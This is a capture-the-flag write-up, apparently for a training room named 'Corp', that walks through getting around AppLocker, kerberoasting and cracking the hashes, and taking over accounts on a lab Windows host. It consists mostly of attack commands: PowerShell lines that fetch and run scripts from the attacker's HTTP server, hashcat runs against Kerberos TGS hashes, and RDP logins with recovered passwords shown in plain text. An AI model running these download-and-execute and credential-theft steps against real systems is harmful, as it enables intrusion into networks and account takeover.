# Corp **Room Link:** ## Bypassing Applocker Load PowerUp.ps1 into memory. **Kali** ``` wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 python2 -m SimpleHTTPServer 81 ``` Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded **PowerUp.ps1** ``` Invoke-AllChecks ``` **Victim(powershell)**

powershell -ep bypass
iex(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')

**Kali** ``` echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d ```

**Kali** ``` xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200 Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T ```

## Kerberoasting Run the below command from the Administrator account we just got access to. **Victim(powershell)** ``` setspn -T medin -Q */* ```

**Kali** ``` wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 python2 -m SimpleHTTPServer 81 ``` Add the following line at the bottom to Invoke-Kerberoast.ps1 so it runs automatically once downloaded ``` Invoke-Kerberoast -OutputFormat hashcat |fl ``` **Victim(powershell)** ``` powershell -ep bypass powershell -c "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.131.240:81/Invoke-Kerberoast.ps1'))" ```

Run this to get rid of all the spaces. **Kali** ``` cat hash.txt | sed 's/[[:space:]]//g' |tr -d '\n' | sed 's/$krb5tgs$23$*/\n&/g' > hash.txt ``` Lets use hashcat to bruteforce this password. The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100. **Kali** ``` hashcat -m 13100 -a 0 hash2.txt /usr/share/wordlists/rockyo.txt --force hashcat -m 13100 -a 0 hash2.txt /usr/share/wordlists/rockyou.txt --force --show ```

**Kali** ``` xfreerdp +clipboard /u:"fela" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200 Password: rubenF124 ```